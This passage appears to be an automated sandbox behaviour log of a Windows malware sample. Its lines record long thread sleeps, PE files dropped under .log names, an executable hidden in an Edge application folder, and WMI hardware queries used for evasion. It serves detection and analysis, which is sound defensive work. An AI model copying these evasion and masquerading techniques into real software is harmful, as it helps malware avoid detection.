                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 596188Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 595969Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 595750Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 595531Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 595250Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 595047Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 594785Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 594578Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 594360Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 594000Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 593688Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 593359Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 593063Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 592594Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 592219Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 591781Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 591422Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 591110Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 590813Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 590406Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 590063Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 589766Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 589500Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 589094Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 588813Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 588281Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 587969Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 587563Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 587328Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 587016Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 586672Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 586250Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585910Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585750Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585594Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585443Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585313Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585188Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585016Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 584802Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 584672Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 584562Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 584443Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWindow / User API: threadDelayed 6618Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWindow / User API: threadDelayed 3009Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeDropped PE file which has not been started: C:\Users\user\Desktop\phDaBATS.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\odxAFePx.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZXODDOCy.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\hgJAcPUI.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\xHFppYee.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeDropped PE file which has not been started: C:\Users\user\Desktop\otzSQnXU.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeDropped PE file which has not been started: C:\Users\user\Desktop\MyEwMoxX.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\HZSnKfqJ.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeDropped PE file which has not been started: C:\Users\user\Desktop\xWHHAgmB.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeDropped PE file which has not been started: C:\Users\user\Desktop\PjjNTCHQ.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\QZsVJdpt.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\sUnrMbPq.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeDropped PE file which has not been started: C:\Users\user\Desktop\GFbXjJsj.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeDropped PE file which has not been started: C:\Users\user\Desktop\HqZFZAkM.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe TID: 7436Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7668Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -599890s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -599781s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -599670s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -599547s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -599438s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -599313s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -599188s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -599063s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -598953s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -598844s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -598719s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -598609s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -598500s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -598391s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -598281s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -598125s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -597813s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7872Thread sleep time: -3600000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -597406s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -597016s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -596453s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -596188s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -595969s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -595750s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -595531s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -595250s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -595047s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -594785s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -594578s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -594360s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -594000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -593688s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -593359s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -593063s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -592594s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -592219s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -591781s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -591422s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -591110s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -590813s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -590406s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -590063s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -589766s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -589500s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -589094s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -588813s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -588281s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -587969s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -587563s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -587328s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -587016s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -586672s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -586250s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -585910s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -585750s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -585594s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -585443s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -585313s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -585188s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -585016s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -584802s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -584672s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -584562s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe TID: 7888Thread sleep time: -584443s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E9A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E9A69B
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00EAC220
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAE6A3 VirtualQuery,GetSystemInfo,0_2_00EAE6A3
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599890Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599781Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599670Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599547Jump to behavior
